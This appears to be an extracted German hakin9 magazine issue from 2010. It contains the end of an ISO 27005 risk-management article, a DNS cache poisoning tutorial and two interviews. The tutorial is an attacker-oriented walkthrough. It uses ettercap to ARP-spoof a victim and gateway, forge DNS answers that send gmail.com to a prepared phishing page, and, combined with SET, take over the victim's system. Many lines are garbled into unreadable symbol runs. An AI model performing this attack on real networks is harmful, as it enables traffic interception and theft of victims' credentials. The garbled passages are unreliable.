Mangelnder baulicher Schutz von Räumen mit IT-Einrichtungen<br />
��� ���������������������������������������������<br />
��� ����������������������������<br />
��� �������������� ������������ ����������� �������<br />
heitsbewusstsein<br />
��� �<br />
����� ���������������������� ���� ���� ������������ ����<br />
Sicherheitsschwächen und muss sowohl das Umfeld<br />
<strong>als</strong> auch bereits vorh<strong>and</strong>ene Schutzmaßnahmen mit<br />
einbeziehen. Es ist wichtig, jede Schwachstelle daraufhin<br />
zu bewerten, wie leicht es ist, sie auszunutzen.<br />
����� �������������� ����������� ���� ��������������� ���<br />
���������������������������������<br />
Vor der eigentlichen Risikobewertung werden noch<br />
die bestehenden Sicherheitsmaßnahmen betrachtet<br />
und bewertet. Stellt sich heraus, dass eine bereits existierende<br />
oder geplante Maßnahme ihren Anforderungen<br />
nicht gerecht wird, so ist zu prüfen, ob sie ersatzlos<br />
entfernt, durch <strong>and</strong>ere Maßnahmen ersetzt oder aus<br />
Kostengründen belassen werden soll.<br />
Abbildung 4. Beispielhafte Risikomatrix (Bildquelle: HMP)<br />
ABWEHR<br />
Im Rahmen dieses Schrittes sollte auch geprüft werden,<br />
ob die bereits existierenden Sicherheitsmaßnah-<br />
���������������������������������������������������<br />
ständig eingesetzte Sicherheitsmaßnahmen stellen eine<br />
zusätzliche potentielle Schwachstelle eines Systems dar.<br />
Die eigentliche Risikobewertung ist nun das Zusammenführen<br />
der in den vorherigen Abschnitten beschriebenen<br />
Maßnahmen und die Erstellung einer Risikomatrix (vergl.<br />
Abb. 4). Darin werden die bewerteten Risiken gemäß ihres<br />
Risikopotenzi<strong>als</strong> in einer Matrix angeordnet und dem gewünschten<br />
SOLL gegenüber gestellt. Im Anhang der Norm<br />
befinden sich einige Beispiele für eine Risikobewertung.<br />
Anh<strong>and</strong> der Risikomatrix erfolgt die Priorisierung der<br />
Risiken, in Abhängigkeit des zur Verfügung stehenden<br />
Budgets und der Ressourcen.<br />
Risikobeh<strong>and</strong>lung<br />
Die Phase der Risikobeh<strong>and</strong>lung ist das „tägliche Tun“<br />
���� ������������������� ��� ������ ���� ���� ������<br />
bezogen auf die Informationstechnologie das Gegenüberstellen<br />
der Anforderungen aus der Risikobewertung<br />
mit dem Ergebnis der durchgeführten Maßnahmen<br />
und eine neue Bewertung dieser: vergl. Abb.<br />
5.<br />
Die Optionen zur Risikobeh<strong>and</strong>lung werden in 4 Kategorien<br />
eingeteilt:<br />
��� ���������������������������������������������������<br />
bestimmter Maßnahmen, etc.)<br />
��� �����������������������������������������������<br />
��� ����������������������������������������������������<br />
tiger Verfahren)<br />
��� ������������������������������������������<br />
Risikoüberwachung und –akzeptanz<br />
Basierend hierauf erfolgt eine neue Bewertung des<br />
Restrisikos und der Risikomanagementprozess geht<br />
10/2010
Abbildung 5. Ablauf Risikobeh<strong>and</strong>lung (Bildquelle: CIS)<br />
über in die Risikoüberwachung. Diesen Ablauf – auch<br />
PDCA-Prozess genannt (Plan-Do-Check-Act) – kennen<br />
Sie bereits aus dem vorherigen Artikel über die ISO<br />
27001. Eine neue Bewertung ist ebenfalls durchzuführen,<br />
wenn sich Vorgaben ändern, neue Assets implementiert<br />
werden oder die Bedrohungssituation sich ändert.<br />
Bei der Risikoakzeptanz ist es wichtig, die Entscheidungskriterien<br />
detailliert zu dokumentieren, damit sich<br />
auch später noch nachvollziehbar sind.<br />
Risikoreporting<br />
Sinn des Risikoreportings ist zum einen die Information<br />
des Managements über den aktuellen St<strong>and</strong> der Risikosituation<br />
und der eingeleiteten Maßnahmen, zum<br />
<strong>and</strong>eren dient diese natürlich auch der Dokumentation.<br />
Weitere Inhalte können z.B. sein, das Sicherheitsbewusstsein<br />
zu verbessern oder das Einfordern von Entscheidungen.<br />
Die Ergebnisse von Risikobewertungen sind i.d.R.<br />
vertraulich und dementsprechend zu h<strong>and</strong>haben.<br />
Kapitel 4 – Nutzen und Fazit<br />
Die Einführung eines Risikomanagementsystems<br />
nach ISO/IEC 27005:2008 unterscheidet sich vom<br />
Prozess her nur in Teilbereichen von der Einführung<br />
eines kompletten Risikomanagementsystems nach<br />
ISO/IEC 31000. Jedoch ist der Aufw<strong>and</strong> wesentlich<br />
geringer, da es sich nur um einen Teilbereich des Unternehmens<br />
h<strong>and</strong>elt. Auch hier gilt wieder der Grundsatz,<br />
dass Unternehmen, die bereits ein Qualitätsmanagement-System<br />
im Einsatz haben (z.B. ISO 9001),<br />
weniger Zeit benötigen, da ihnen die Prozess-orien-<br />
IT-Risikomanagement – Wozu brauche ich das?<br />
tierte Denkweise und das strukturierte Vorgehen bereits<br />
vertraut sind.<br />
Ohne Informations- und Kommunikationstechnik<br />
kann heute kaum noch ein Unternehmen auskommen,<br />
auch nicht zeitweise. Das gilt auch für kleinere und mittlere<br />
Unternehmen genauso wie für Großunternehmen<br />
und Konzerne. Deshalb sollte das Management wissen,<br />
welche Risiken gerade im IT-Bereich bestehen und wie<br />
diesen begegnet werden kann. Gerade im Bereich der<br />
Informations- und Telekommunikationssysteme sind<br />
die immateriellen Werte, <strong>als</strong>o diejenigen Werte, denen<br />
nicht eine Einkaufsrechnung gegenübergelegt werden<br />
kann, häufig kaum bekannt.<br />
Die Norm ISO/IEC 27005:2008 bietet den Vorteil,<br />
dass mit einem kleinen Teilbereich (z.B. Netzwerk) begonnen<br />
werden kann und sukzessive weitere Assets<br />
einbezogen werden können. Zudem bietet die Norm im<br />
Anhang Beispiele und Checklisten für das Vorgehen.<br />
ANDREAS LENTWOJT<br />
Der Autor ist Managementberater, CEO und Inhaber „AL-<br />
Consult“. Nach dem Studium der Betriebswirtschaft mit den<br />
Schwerpunkten Organisation und IT arbeitete er langjährig<br />
bei Banken und Finanzdienstleistern <strong>als</strong> Organisations-/IT-<br />
Leiter und später <strong>als</strong> Security-Offi cer. 2004 gründete er das<br />
Beratungsunternehmen ALConsult mit den Schwerpunkten<br />
Security und Prozessmanagement. Er ist zertifi zierter ISO<br />
27001-Auditor und besitzt weitere Zertifi kate wie CObIT und<br />
ITIL. Der Schwerpunkt der Beratung liegt im organisatorischen<br />
Bereich und den Prozessen, nicht auf der Technik.<br />
hakin9.org/de 35
��������<br />
�������<br />
�������<br />
��������������<br />
���������������������<br />
������������<br />
����� ����������������<br />
����� ����������������<br />
�����������������<br />
����������������<br />
���������������������������<br />
�������������������������������������<br />
��������������������������������������<br />
������������������������������<br />
�������������������������������������������<br />
����������������������������������������<br />
��������������������������������������<br />
�����������������<br />
��������������<br />
����������������������<br />
���������������������������������������������������<br />
������������������������������������<br />
���������������������������������������<br />
����������������<br />
��������������������<br />
��������������������������������������
DNS Cache Poisoning<br />
DNS Cache Poisoning<br />
Patrick Schmid<br />
Als Ergänzung zu meinem ersten Artikel Java Applet Attacke<br />
erfahren wir hier, wie wir ein Opfer mittels DNS Spoofing<br />
unbemerkt eine präparierte Seite unterschieben können.<br />
IN DIESEM ARTIKEL ERFAHREN SIE...<br />
��� ������������������������������������������������<br />
��� �������������������������������������������<br />
Vor einiger Zeit habe darüber geschrieben,<br />
wie man mit SET auf einfache Art und Weise<br />
eine Java Applet Attacke durchführen<br />
kann. Dieser Artikel lies aber offen, wie man das<br />
Opfer auf die präparierte URL umleitet, was mitunter<br />
wahrscheinlich der schwierigste Teil des ganzen<br />
Angriffes ist. Damit eine solche Attacke aber auch<br />
erfolgreich eingesetzt werden kann, dient dieser Artikel<br />
<strong>als</strong> Ergänzung, um diese Informationslücke zu<br />
füllen.<br />
Abbildung 1. Eine Anfrage (rot) an Ziel<br />
WAS SIE VORHER WISSEN/KÖNNEN SOLLTEN...<br />
��� ���������������������������������������<br />
��� ����������� ��� �������� ����������������������� ���� ������<br />
gement.<br />
Um ein Opfer auf eine präparierte Seite umzuleiten,<br />
ist DNS Cache Poisoning (auch DNS Spoofing genannt)<br />
eine effektive und schnelle Möglichkeit. Darunter<br />
versteht man ein Angriff, wobei Einträge in einem DNS<br />
zu eigenen Gunsten manipuliert werden.<br />
Das Opfer merkt dabei im Idealfall nichts davon: Dieses<br />
tippt wie üblich zum Beispiel www.google.ch ein,<br />
nur anstatt bei der DNS-Abfrage die IP-Adresse der<br />
Google-Server zurückkommt, erhält das Opfer die IP-<br />
Adresse einer präparierten Seite.<br />
hakin9.org/de 37
38<br />
Für diese Attacke werden wir das Tool ettercap verwenden,<br />
da es relativ einfach aufgebaut ist, dabei aber<br />
trotzdem viele Einstellungsmöglichkeiten bietet.<br />
Unsere Attacke wird in zwei Stufen aufgebaut sein.<br />
Als erstes müssen wir das Opfer oder besser dessen<br />
Computer dazu bringen, seinen ganzen Traffic auf unseren<br />
Computer umzuleiten, <strong>als</strong>o eine sogenannte<br />
Man-in-the-middle-Attacke ausführen.<br />
Dazu werden wir ARP Spoofing verwenden. ARP ist<br />
ein Protokoll auf Layer 2 (Sicherung), um anh<strong>and</strong> einer<br />
IP-Adresse die zugehörige MAC-Adresse abzufragen.<br />
Die Funktionsweise von ARP Spoofing ist einfach. Der<br />
Grund für dessen Erfolg ist der dynamische ARP-Cache<br />
auf jedem Client und eine Zuordnungstabelle auf jedem<br />
Switch: Ein Switch führt eine Zuordnungstabelle, worin die<br />
MAC-Adressen der angeschlossenen Geräte dem jeweiligem<br />
Port zugeordnet sind. Diese gibt es deshalb, weil ein<br />
Switch somit genau weiss, welches System an welchem<br />
Port angeschlossen ist und somit auch, an welchen Port<br />
ein einzelnes Datenpaket weitergeleitet werden muss.<br />
Der Client führt einen eigenen ARP-Cache, worin er<br />
eine MAC-Adresse einer IP-Adresse zuordnet, sodass<br />
er nicht vor jedem Versenden eines Paketes die MAC-<br />
Adresse zu einer IP neu abfragen muss.<br />
Veranschaulicht könnte das dann so ablaufen (Bild 1):<br />
��� ���� ������� ������ ����� ���������� ������ �������� ����<br />
nen ARP-Cache nach der MAC-Adresse des Zieles<br />
ab und packt diese danach mit in das Paket.<br />
��� ���� ������� ������ ���� ������������ ���� ���� ������<br />
aus und weiss anh<strong>and</strong> seiner Zuordnungstabelle<br />
das zu dieser MAC-Adresse der Port 1 gehört, worauf<br />
er das Paket an Port 1 und somit an das Ziel<br />
weiterleitet.<br />
���� ���� ��������� ����� ���� ���������� ���� ����������<br />
seines Opfers so verändern, dass eine IP-Adresse einer<br />
total neuen, beliebigen MAC-Adresse zugeordnet wird.<br />
Abbildung 2. Eine Anfrage (rot) an Ziel während ARP-Spoofi ng<br />
ANGRIFF<br />
Wieder ein Beispiel dazu (Bild 2):<br />
��� ���������������������������������������������<br />
��������������������������������������������������<br />
les nicht mehr die MAC-Adresse des Zieles, sondern<br />
die des Angreifers zugeordnet ist.<br />
��� ���� ������� ������ ���� ������� ����� ���������� ������<br />
Paketes seinen ARP-Cache nach der MAC-Adresse<br />
des Zieles ab. Aber anstatt von seinem ARP-<br />
Cache auch die MAC-Adresse des Zieles zu erhalten,<br />
bekommt er die des Angreifers, welche er in totaler<br />
Unwissenheit in sein Paket packt.<br />
��� ���������������������������������������������<br />
Pakete aus und vergleicht diese mit seiner Zuordnungstabelle.<br />
Anh<strong>and</strong> der MAC-Adresse (die des<br />
Angreifers) sendet er das Paket an Port 2 und somit<br />
an den Angreifer und nicht wie vom Opfer geplant<br />
an das Ziel.<br />
Somit geht der Verkehr aber erst vom Opfer zum Angreifer.<br />
Damit das Oper davon aber nichts merkt, muss der<br />
Angreifer die abgefangene Anfrage an das Ziel weiterleiten.Nun<br />
verläuft die Kommunikation schon vom Opfer<br />
über den Angreifer zum Ziel.<br />
Damit man aber auch den gesamten Verkehr in die <strong>and</strong>ere<br />
Richtungen, <strong>als</strong>o Anfragen und Antworten mitkriegt,<br />
macht man ARP-Attacken immer auf den Client und den<br />
Router / Gateway gleichzeitig, womit nun eine Kommunikation<br />
vom Opfer über den Angreifer zum Ziel und auch<br />
wieder zurück möglich ist. Damit ist die Man-in-the-Middle-<br />
Attacke komplett und der Angreifer ist in der Lage, den<br />
gesamten Netzwerkverkehr seines Opfers nicht nur abzufangen<br />
und mit zuhören, sondern auch beliebig zu verändern,<br />
was uns auch sogleich zu Schritt 2 bringt.<br />
Im ersten Artikel haben wir <strong>als</strong> Beispiel die Seite Gmail<br />
kopiert und präpariert. Also wollen wir auch gleich dort<br />
anknüpfen.<br />
10/2010
Nun gilt es für den Angreifer darauf zu warten, bis das<br />
Opfer den A-Record von gmail.com abfragt. Sehen wir<br />
nun in unserem mitgehörten Traffic eine solche Anfrage,<br />
so muss das Antwortpaket soweit verändert werden,<br />
dass anstatt die tatsächliche IP-Adresse nun die IP-Adresse<br />
zu unserer präparierten Seite übermittelt wird.<br />
Das Opfer selbst empfängt und akzeptiert das so,<br />
weil es selbst von der Veränderung nichts mitbekommt.<br />
Alle Anfragen, welche das Opfer von nun an an Gmail<br />
macht, werden nicht an Gmail selbst, sondern an unsere<br />
präparierte Seite ges<strong>and</strong>t, womit unser Vorhaben<br />
erfüllt wäre.<br />
So nun genug Theorie, schreiten wir zur Tat!<br />
Beide Schritte können direkt mit ettercap durchgeführt<br />
werden.<br />
Dabei h<strong>and</strong>elt es sich um ein Stück Software mit Spezialisierung<br />
auf Man-in-the-Middle-Attacken, welches<br />
unter der GPL wahlweise für Windows, Linux oder Mac<br />
veröffentlicht wurde.<br />
Leider wurde es seit einiger Zeit nicht mehr weiterentwickelt,<br />
was sich jedoch nicht auf die Funktionalität<br />
auswirkt.<br />
Ettercap kann wahlweise via GUI oder Konsole bedient<br />
werden, doch erstmal wird alles konfiguriert.<br />
Zuerst müssen wir unsere eigenen A-Rekords für<br />
gmail.com anlegen. Dazu editieren wir die Datei /usr/<br />
share/ettercap/etter.dns und erweitern diese um einen<br />
Eintrag wie in Listing 1 dargestellt.<br />
Wenn wir nun speichern, so haben wir festgelegt,<br />
dass Anfragen nach der IP von gmail.com oder *.gmail.<br />
com mit 127.0.0.1 beantwortet werden sollen.<br />
Listing 1. ein A-Record für eine präparierte Seite von<br />
gmail.com<br />
*.gmail.com A 127.0.0.1<br />
gmail.com A 127.0.0.1<br />
Abbildung 3. GTK-GUI von ettercap<br />
DNS Cache Poisoning<br />
Somit sind wir auch schon bereit und können bereits<br />
mit Schritt 1 beginnen.<br />
Dazu starten wir ettercap und wählen unter dem<br />
Punkt Sniff den Unterpunkt Unified sniffing aus. Dabei<br />
werden wir nach dem Interface gefragt, über welches<br />
der Angreifer mit dem Netzwerk des Opfers verbunden<br />
ist. Im Falle einer Verbindung via Kabel ist das meist<br />
eth0, bei WLAN meist wlan0.<br />
Ist auch das vollbracht, so können das oder die Ziele<br />
identifiziert werden. Dazu wählen wir den Punkt Hosts ><br />
Scan for hosts, wodurch automatisch alle 255 Hosts im<br />
Subnet angepingt werden (Bild 3).<br />
Ist auch das durchgest<strong>and</strong>en, so können die Ziele unter<br />
Hosts > Hosts list ausgewählt werden. Als Target 1<br />
muss der Router oder Gateway und das Opfer <strong>als</strong> Target<br />
2 ausgewählt werden. Hier muss gegebenenfalls<br />
mit nmap nach geprüft werden um die IP des Opfers zu<br />
identifizieren.<br />
Nun kann mit dem Selektieren von Mitm > Arp poisoning<br />
die ARP-Attacke gestartet und Schritt 1 somit beendet<br />
werden.<br />
Wird nun Wireshark oder tcpdump gestartet, so kann<br />
man allen Netzwerkverkehr des Opfers und des Routers<br />
/ Gateways mitgehört werden.<br />
Nun gleich weiter zu Schritt 2. Nachdem die Man-inthe-Middle-Attacke<br />
steht, können wir dem Opfer nun<br />
unsere DNS-Records aufzwingen.<br />
Dazu verwenden wir die ettercap-Plugins unter dem<br />
Punkt Plugins > Manage the plugins. Da wählen wir den<br />
Punkt dns_spof aus.<br />
Und somit ist unser DNS-Spoofing-Angriff einsatzfähig<br />
und aktiv.<br />
Wem <strong>als</strong> Angreifer kein GUI zur Verfügung steht, der<br />
kann auch den interaktiven Modus von ettercap verwenden.<br />
Dazu muss ettercap nur mit der Option -T aufgerufen<br />
werden. Alles weitere ist dann in der Hilfe (h-<br />
Taste) nachzulesen.<br />
Nun ist alles getan! Jedes mal wenn nun unser Opfer<br />
die Webseite von Gmail aufruft, wird es auf unsere<br />
präparierte Seite umgeleitet, ohne dass es davon etwas<br />
merkt.<br />
In Kombination mit SET erhält ein Angreifer so mühelos<br />
Zugriff auf ein fremdes System.<br />
Links<br />
��� http://seicon.ch Unternehmen des Autors<br />
��� http://blog.encodingit.ch� ���������������<br />
PATRICK SCHMID<br />
Der Autor ist System Engineer im Bereich Linux / Unix und<br />
unterstützt nebenbei die Entwicklung und Verbreitung von Linux<br />
und Opensource im privaten wie auch im professionellen<br />
Umfeld.<br />
hakin9.org/de 39
Interview mit Tobias Glemser<br />
„Sicherheit darf nicht erst am Ende von neuen<br />
Anwendungen, Produkten oder Projekten <strong>als</strong><br />
Kontrollinstrument einbezogen, sondern muss<br />
<strong>als</strong> integraler und vor Allem unterstützender<br />
Best<strong>and</strong>teil eines erfolgreichen Produkts<br />
gesehen werden.“<br />
Interview mit Tobias Glemser<br />
hakin9: Erzählen Sie uns bitte ein wenig über sich<br />
selbst: wer sind Sie, was machen Sie und wie ist es<br />
dazu gekommen, dass Sie sich mit IT-Sicherheit<br />
Branche beschäftigen?<br />
Tobias Glemser: Mein Name ist Tobias Glemser, ich<br />
bin leitender IT-Sicherheitsberater bei der Tele-Consulting<br />
security networking training GmbH in Gäufelden bei<br />
Stuttgart und verantwortlich für den Geschäftsbereich<br />
Penetrationstests. Zu Schul- und Zivildienstzeiten hatte<br />
ich bereits den ersten Kontakt mit technischen Audits<br />
und habe schlicht das Hobby zum Beruf gemacht. Seit<br />
über zehn Jahren bin ich in entsprechenden Projekten<br />
tätig. Am Wichtigsten ist der kreative Umgang mit Systemen<br />
und Anwendungen. Funktionen, die ein Entwickler<br />
nach besten Wissen und Gewissen implementiert<br />
hat so zu nutzen, dass sie nicht mehr dem ursprünglichen<br />
Zweck dienen. Im Projektumfeld erhält man viele<br />
Einblicke in Techniken und Prozesse in unterschiedlichen<br />
Firmen und Behörden, z. B. Energie, Flugraumüberwachung,<br />
Banken. Neben den technischen Aspekten<br />
ist es mein und unser Ziel mit allen Beteiligten des<br />
Kunden ein gemeinsames Ziel zu erreichen. So wäre es<br />
aus meiner Sicht unsinnig, technische Schwachstellen<br />
mit rein technischen Hilfestellungen zu beheben. Der<br />
Ansatz springt deutlich zu kurz. Vielmehr geht es auch<br />
darum, auf Prozesse abzuleiten und diese zu verbessern.<br />
Diese Nachhaltigkeit und die positiven Rückmeldungen<br />
treiben an. Darüber hinaus bin ich frei in der<br />
Beratung, d. h. wir haben keine Produkte im Portfolio,<br />
die bei einem technischen Audit möglichst gleich mit angepriesen<br />
werden müssen.<br />
hakin9: Bereits bei mehreren tausend Tests<br />
von Netzen und Systemen haben Sie den<br />
selbstentwickelten Security Scanner tajanas genutzt.<br />
Was unterscheidet tajanas von <strong>and</strong>eren solchen<br />
Werkzeugen?<br />
Tobias Glemser: Wir haben tajanas zunächst für eigene<br />
Zwecke entwickelt und setzten es auch heute <strong>als</strong><br />
Basis in Penetrationstests ein. tajanas ist ein Frame-<br />
work und Webfrontend für die grundsätzliche Prüfung<br />
eines Systems mit automatisierten Port- und Vulnerability-Scans<br />
und einheitlichem Reporting pro System.<br />
Wir haben dabei das Ziel verfolgt, nicht das Rad neu<br />
zu erfinden, sondern etablierte Programme für die eigentlichen<br />
Prüfungen zu nutzen. Die Ergebnisse der<br />
einzelnen Schritte werden analog zu einer manuellen<br />
Prüfung mit den jeweiligen Programmen automatisiert<br />
verknüpft. Dies ermöglicht eine wesentliche schnellere<br />
Durchführung bei gleicher Ergebnis-Qualität. Darüber<br />
hinaus ist die Oberfläche so gehalten, dass nur die notwendigsten<br />
Optionen zur Verfügung stehen.<br />
Neben der Schwachstellen-Prüfung ist auch eine<br />
Erreichbarkeitsprüfung integriert, um einen schnellen<br />
Überblick über aktive Systeme in Netzen zu erhalten.<br />
Es ist wichtig zu verstehen, dass Penetrationstests<br />
ohne automatisierte Tests nicht funktionieren. Die schiere<br />
Anzahl an Schwachstellen lässt sich nur sinnvoll mit<br />
entsprechenden Programmen prüfen. Die Ergebnisse<br />
sind dann die Basis für weitere, manuelle Tests. Dabei<br />
wird mit Know-How und Kreativität versucht, weitere<br />
Lücken zu finden, um und diese dann auszunutzen.<br />
hakin9: Wie erfolgt die Bedienung des Scanners, und<br />
welche Lizenzen und Module existieren?<br />
Tobias Glemser: Die Bedienung erfolgt vollständig<br />
über eine webbasierte Oberfläche. tajanas wird <strong>als</strong> VMware-<br />
oder Hardware-Appliance ausgeliefert, der Endbenutzer<br />
kann alle Funktionen – dazu gehören auch Aktualisierungen<br />
– über die Weboberfläche nutzen, Jeder<br />
Nutzer erhält natürlich trotzdem vollständigen Root-Zugriff<br />
auf das System. Die Lizenzierung erfolgt pro Installation,<br />
eine Limitierung auf IP-Adressen oder eine<br />
gewisse Anzahl Scans erfolgt nicht. Neben dem Audit-<br />
Modul, gibt es auch ein Modul für die Erreichbarkeitsprüfung.<br />
hakin9: Woher kommt der Name tajanas?<br />
Tobias Glemser: tajanas steht für „this ain’t just another<br />
network scanner” – weil es ein wie beschrieben ein<br />
hakin9.org/de 41
42<br />
Framework darstellt und nicht den n-ten Port- oder Vulnerability-Scanner.<br />
Wenn wir Bugs in den verwendeten<br />
Programmen feststellen oder Ideen für Erweiterungen<br />
haben, geben wir diese direkt in die Community zurück.<br />
hakin9: Wer sind Benutzer von tajanas?<br />
Tobias Glemser: Zum einen natürlich wir selbst. Zum<br />
<strong>and</strong>eren setzten IT-Sicherheitsbeauftragte und IT-Revisoren<br />
das Tool für regelmäßige Sicherheitsprüfungen<br />
ihrer Netze ein.<br />
hakin9: Für welche Fälle reichen Penetrationstests<br />
nicht aus?<br />
Tobias Glemser: Das hängt von der Zieldefinition des<br />
Kunden ab, und was man unter einem Penetrationstest<br />
versteht. Bei Tele-Consulting sind alle Mitarbeiter nicht<br />
nur in technische Audits wie Penetrationstests eingebunden,<br />
sondern auch in prozessorientierte Beratungen und<br />
Audits wie z. B. ISO 27001 oder BSI IT-Grundschutz.<br />
Dies ermöglicht es uns, in technischen Audits nicht nur<br />
die technischen Lücken aufzuzeigen, sondern auch auf<br />
fehlende oder mangelhafte Prozesse hinzuweisen und<br />
konkrete Vorschläge zur Verbesserung zu geben.<br />
hakin9: Können Sie uns ein konkretes Beispiel<br />
nennen?<br />
Tobias Glemser: Nehmen wir an, dass aus Wirtschaftlichkeitsgründen<br />
nicht alle Server in einem Netz in ein<br />
technisches Audit einbezogen werden, sondern nur eine<br />
definierte Anzahl. Stellt man hier Schwachstellen fest,<br />
so genügt es nicht, die erkannten Schwachstellen oder<br />
gar Lücken zu schließen, sondern man muss sich fragen,<br />
wie es zu den Schwachstellen kommen konnte. In<br />
den seltensten Fällen haben hier Administratoren individuelle<br />
Fehler gemacht, vielmehr scheinen offensichtlich<br />
die Vorgaben zur Serverkonfiguration bzw. Härtung<br />
nicht ausreichend zu sein bzw. diese in ein Information<br />
Security Management System (ISMS) integriert zu sein.<br />
Darauf weisen wir nachdrücklich in unseren Ergebnisberichten<br />
hin, um eine Gesamtverbesserung zu erzielen<br />
und unterstützen bei Bedarf auch bei der Umsetzung<br />
der organisatorischen Anteile.<br />
Geht man diesen Schritt nicht, werden erfahrungsgemäß<br />
nur die Systeme verändert, bei denen im Test<br />
Schwachstellen erkannt wurden. Der Verbesserung der<br />
Gesamtsicherheit hilft dies dann allerdings nicht.<br />
hakin9: Wie sieht eine Sicherheitsüberprüfung<br />
mithilfe des Penetrationstests aus?<br />
Tobias Glemser: Zunächst bedarf es einer klaren Zielvorstellung.<br />
Entweder haben Kunden diese bereits,<br />
oder sie wird im Rahmen eines Workshops gemeinsam<br />
erarbeitet. Dabei ist es meist sinnvoll mehrstufig vorzugehen<br />
und die Themen in verschiedenen Arbeitspaketen<br />
abzuarbeiten. Im Rahmen eines Kick-Offs werden<br />
die Beteiligten informiert und in den Ablauf integriert.<br />
INTERVIEW<br />
Nach der Durchführung erhält der Kunde einem umfassenden,<br />
auf seine Umgebung und Realität angepassten<br />
Ergebnisbericht, der im Rahmen eines Abschluss-<br />
Workshops mit den technischen verantwortlichen<br />
besprochen wird. Auf Wunsch erfolgt auch die Darstellung<br />
vor dem Vorst<strong>and</strong> bzw. der Leitungsebene.<br />
Das Spektrum eines Penetrationstests ist sehr vielfältig<br />
und lässt sich nur schwer darstellen. Es h<strong>and</strong>elt<br />
sich dabei jedoch nicht zwingend um die „bekannten“<br />
Prüfungen auf Serversysteme. Häufige Einfallstore für<br />
Angreifer sind schlecht gesicherte lokale Netzwerke,<br />
Client-Systeme oder auch Multifunktionsdrucker. Bei<br />
Interesse finden sich Informationen z. B. in der Studie<br />
Penetrationstests des BSI, dem Whitepaper Penetrationstests<br />
der Tele-Consulting oder auch dem Whitepaper<br />
Projektierung der Sicherheitsprüfung von Webanwendungen<br />
der OWASP.<br />
hakin9: Welche Pläne die IT-Sicherheit Branche<br />
betreffend haben Sie noch vor?<br />
Tobias Glemser: Abseits von technischen Audits versuchen<br />
wir ganzheitliche Prozesse vor allem, aber nicht<br />
nur in den IT-Abteilungen zu etablieren und dabei Administratoren<br />
die Hilfestellungen zu geben, die sie dabei<br />
benötigen. Als Sicherheitsberater oder auch Sicherheitsbeauftrager<br />
eines Unternehmens nimmt man meist<br />
die Rolle eines Kontrolleurs ein, der darauf achtet, dass<br />
Regeln eingehalten werden. Hier ist ein W<strong>and</strong>el erforderlich,<br />
sowohl bei denen, die sich „Sicherheit“ auf die<br />
Fahnen schreiben, <strong>als</strong> auch bei den Administratoren<br />
und Verantwortlichen für Geschäftsbereiche und deren<br />
Technik. Sicherheit darf nicht erst am Ende von neuen<br />
Anwendungen, Produkten oder Projekten <strong>als</strong> Kontrollinstrument<br />
einbezogen, sondern muss <strong>als</strong> integraler und<br />
vor Allem unterstützender Best<strong>and</strong>teil eines erfolgreichen<br />
Produkts gesehen werden. Hier müssen auch und<br />
vor allem Sicherheitsberater umdenken, um vorrangig<br />
<strong>als</strong> Unterstützer, die sie sind, gesehen und akzeptiert<br />
zu werden. Nur so begreifen die technisch verantwortlichen<br />
Mitarbeiter Sicherheitsprüfungen nicht <strong>als</strong> Prüfungen<br />
ihrer persönlichen Kompetenz, sondern <strong>als</strong> konkrete<br />
Unterstützung für die Verbesserung vorh<strong>and</strong>ener<br />
Sicherheitsprozesse.<br />
Im Bereich der technischen Schwachstellen werden<br />
weiterhin Webanwendungen eine große Rolle spielen.<br />
Daher bin ich seit geraumer Zeit beim Open Web Application<br />
Security Project (OWASP), den meisten vermutlich<br />
durch die OWASP Top 10 bekannt, ehrenamtlich<br />
tätig und seit diesem Jahr im Board der deutschen Sektion.<br />
Beim OWASP Stammtisch Stuttgart (und Stammtischen<br />
in <strong>and</strong>eren Städten) tauschen sich hier auch<br />
Menschen rund um das Thema zwanglos aus. Wer<br />
Lust hat vorbeizukommen, kann sich auf der deutschen<br />
OWASP Webseite informieren.<br />
Wir bedanken uns für das Gespräch!<br />
10/2010
44<br />
INTERVIEW<br />
„Erfolgreiche Frauen<br />
in der IT-Branche - ein<br />
Erfahrungsbericht“<br />
Interview mit Ulrike Peter<br />
hakin9: Lassen Sie uns bitte ein wenig über sich selbst<br />
wissen: wer sind Sie, was machen Sie und wie ist es<br />
dazu gekommen, dass Sie in der IT-Branche tätig sind?<br />
Ulrike Peter: Ich bin PR-Spezialistin und Journalistin<br />
durch und durch. Die Liebe zum Schreiben entdeckte<br />
ich früh. Nach ersten Gehversuchen <strong>als</strong> freie<br />
Mitarbeiterin bei einer Tageszeitung absolvierte ich<br />
vor zehn Jahren ein Volontariat in einer PR-Agentur<br />
mit parallelem Fernstudium „Journalismus“. Die ersten<br />
Tage in der Agentur waren wie ein Kopfsprung<br />
ins kalte Wasser. Denn obwohl ich das journalistische<br />
Rüstzeug besaß, wusste ich anfangs nicht mal, wo<br />
sich die Escape-Taste an meinem PC bef<strong>and</strong>, hatte<br />
aber die Aufgabe, ohne spezielles Hintergrundwissen<br />
über komplexe Technologien detaillierte Berichte zu<br />
formulieren. Da dies den Ehrgeiz in mir weckte, arbeitete<br />
ich mich schnell in die Materie ein und stellte<br />
fest, dass Public Relations in Verbindung mit der<br />
Erstellung technologischer Texte mein Steckenpferd<br />
ist. Heute bin ich Geschäftsführerin meiner eigenen<br />
PR-Agentur und obwohl ich mittlerweile auch in weiteren<br />
Branchen und Aufgabengebieten zuhause bin,<br />
ist die Freude daran, „trockene“ und komplexe Inhalte<br />
lebendig werden zu lassen, noch genauso vorh<strong>and</strong>en<br />
wie am ersten Tag.<br />
hakin9: Viele glauben, dass Computer Männersache<br />
sind. Was halten Sie davon?<br />
Ulrike Peter: Die l<strong>and</strong>läufige Meinung existiert nach<br />
wie vor, dass Männer ein besseres technologisches<br />
Verständnis mitbringen. Dies resultiert nicht selten<br />
aus Vorurteilen, lässt sich aber auch nicht komplett<br />
abstreiten. Denn nicht nur Erfahrungswerte, sondern<br />
auch Belege aus der Hirnforschung zeigen, dass<br />
Frauen besser mit Sprache umgehen können und<br />
Männer sich in Naturwissenschaften wohler fühlen.<br />
Es liegt wohl ein Stück weit in der Natur der Sache.<br />
Aber wie heißt es so schön: „Ausnahmen bestätigen<br />
die Regel“. Und der Trend zeigt beispielsweise, dass<br />
Frauen zunehmend technische Studiengänge belegen.<br />
hakin9: Heutzutage sind wir überall von Computern<br />
umgeben. In der IT-Branche herrscht trotzdem ein<br />
Frauenmangel. Woran liegt dies Ihrer Meinung nach?<br />
Ulrike Peter: Noch lockt es wesentlich mehr Männer in<br />
technische Berufe <strong>als</strong> Frauen. Ich denke, das Verhältnis<br />
wird auch in Zukunft so bleiben – auch wenn sich die<br />
klassische Rollenverteilung verschiebt und die „Gren-<br />
10/2010
